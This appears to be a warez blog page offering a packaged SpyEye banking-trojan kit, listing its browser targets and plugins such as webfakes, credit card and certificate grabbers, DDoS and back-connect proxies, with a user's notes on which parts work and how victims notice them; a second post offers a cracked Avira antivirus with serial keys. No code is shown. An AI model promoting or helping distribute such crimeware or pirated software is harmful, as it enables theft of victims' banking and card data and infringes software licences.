[+] Internet Explorer
[+] FireFox
[+] Google Chrome
[+] Opera

Plugins:
[+] Custom Connector (to avoid that your admin panel is being tracked by Spyeyetracker)
[+] Webfakes
[+] RDP (Remote Desktop - Not tested yet)
[+] DDOS
[+] Block
[+] Billinghammer
[+] USB-Spread (I do not recommend that you use this. as it prompts the victim each time they boot their computer with an error - bad code)
[+] Socks5 Back Connect
[+] FTP Back Connect
[+] Bugreport
[+] CC-Grabber or
[+] Creditgrabber
[+] FFcertificate grabber
[+] SpySpread (Have not figured out how this works yet, think its missing something)

This is the newest released software for SpyEye as far as i know.

-I still have problems with socks5 and FTP back connect to show Socks5 or FTPs, im not sure why but theres a Full SpyEye Original Manual on how to setup everything from start to end thats included. Theres also a bunch of explanations of everything inside spyeye and how it works.

Contains all files needed (REMEMBER BUILDER WILL ONLY WORK IN WINDOWS XP)


Monday, February 20, 2012

AVIRA ANTIVIRUS PREMIUM 2012 12.0.0.888 [FINAL] [CRACK] [SERIAL KEY]


Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection:
Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates it offers premium protection. It includes a POP3 based MailScanner that scans emails before they are stored on your machine. With a user-friendly control center, quarantine management, fast performance and world leading detection rates the Avira AntiVir Premium provides essential protection for your PC.

AntiVir Personal offers effective protection against computer viruses for the individual and private use on a single PC-workstation. It detects and removes viruses and includes an Internet-Update Wizard for easy updating.

Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called "H+BEDV Datentechnik GmbH" when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium.
Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite

Serials Works Till 21.1.2012 (Will Update It)



Operating systems :

Works On 32bit/64bit


Site Search